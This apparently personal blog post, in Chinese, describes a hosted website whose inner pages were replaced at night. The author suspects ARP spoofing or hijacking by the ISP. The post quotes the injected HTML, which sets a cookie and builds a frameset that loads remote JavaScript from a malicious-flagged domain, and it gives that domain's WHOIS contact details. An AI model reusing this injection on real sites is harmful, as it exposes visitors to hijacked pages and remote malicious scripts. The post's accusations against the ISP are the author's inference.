正 文:
飘易在紫田网络租用了一个20人合租服务器空间,可是最近却出现了疑似ARP劫持的现象。我所在服务器的ip为61.174.63.177,是浙江丽水电信机房的。
这种疑似ARP的攻击表现为:
1、网站首页正常,但是除了首页外,其他任何内页全部被替换内容;(网页文件下载后检查没有被插入木.马);
2、用IE浏览器或IE核心的浏览器查看网页时,表现为网页标题不能显示,右键查看源码,不能发现被替换的代码;这点比较隐蔽。
3、白天的时候没有被替换,只有晚上人少的时候,这种ARP现象才开始出现。(白天还不敢劫持,到了晚上估计网站值班人员都下班了,电信就开始劫持了)
使用Chrom、Firefox浏览器查看网页源码就可以发现整个网页源码被替换成类似下面的代码:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
****************="";}
}
</script>
<script src="http://www.chaoguqu.com/plus/v64.js"></script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/*.html?updatedata=index">
<frame name="hi" src="">
</frameset>
</html>
其中,js script脚本中的地址 http://www.chaoguqu.com/plus/v64.js 中v64.js 可能会出现其他形式,比如 v54.js、v44.js 等。同时,使用chrome会提示 www.chaoguqu.com 这个网站是恶意病毒网站。
从服务器上的ARP防火墙来看,服务器并没有受到ARP攻击记录。据知情人士透露,前阵子广东电信有发生过电信劫持过用户网站的事,将用户网站的页面以类似上面的方式替换成淘宝广告,以获取秘密利润,后来客户投诉到工信部,广东电信才停止这种劫持用户网站的行为。
据此推断,浙江丽水电信的机房也很有可能被电信劫持,而且这种劫持方式十分隐蔽,用户不注意的话,或者用户对网络技术缺乏,根本无法发现自己的网站被电信劫持。
飘易上面提到的3点现象,无一不说明了这是电信有人恶意的在“
偷偷摸摸”的干坏事。浙江丽水电信啊,你们拿着客户的钱,背地里却干着见不得人的勾当,有多无耻就有多无耻的。
再来看 www.chaoguqu.com 这个破网站,炒股去?域名的whois信息如下:
管理人联系:
Domain Name : chaoguqu.com
Creation Date : 2009-11-18 17:52:37
更新时间 : 2009-11-18 17:52:36
过期时间 : 2010-11-18 17:52:34
Name : wen xiao qiong
Organization : wen xiao qiong
Address : xia men ruan jian yuan hao lou
City : xia men
Province/State : FJ
Country : CN
Postal Code : 361000
Phone Number : 86-0722-4890224
Fax : 86-0722-4890224
Email : 147013333@qq.com
是一个09年底注册的域名。持有人是厦门软件园的 wen xiao qiong,不知道真实与否。该网站的下方全是一堆的黑链,关于地下城与勇士DNF及其外.挂的。这里是一个巨大的黑色利润链,是否内外有人勾结,不得而知。
在连续几天晚上都出现这种ARP现象后,我不得不联系IDC帮我更换了机房。浙江丽水电信,别了。